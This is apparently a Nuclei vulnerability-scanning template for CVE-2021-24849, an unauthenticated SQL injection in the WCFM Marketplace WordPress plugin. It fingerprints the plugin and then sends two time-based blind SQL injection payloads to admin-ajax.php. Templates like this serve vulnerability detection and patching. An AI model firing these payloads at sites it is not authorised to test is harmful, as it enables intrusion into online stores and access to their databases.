nuclei-templates/http/cves/2021/CVE-2021-24849.yaml

70 lines
2.6 KiB
YAML

id: CVE-2021-24849
info:
name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
reference:
- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24849
- https://wordpress.org/plugins/wc-multivendor-marketplace/
remediation: Fixed in 3.4.12
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24849
cwe-id: CWE-89
cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
epss-score: 0.00199
epss-percentile: 0.56492
metadata:
product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible"
framework: wordpress
publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
verified: true
max-request: 3
vendor: wclovers
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,wpscan,sqli
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
condition: and
internal: true
- raw:
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{post_data}}
payloads:
post_data:
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(header, "application/json")'
- 'contains(body, "success")'
condition: and
# digest: 4a0a00473045022100ef54cd087054515b6ef2f1935d258ecea55b3abf384cd95798b8cd351a5f1fe90220070a59d1e5a3ab49e8fc248e2ddc238e33958d75f7b3cfc5700b5018b8116f82:922c64590222798bb761d5b6d8e72950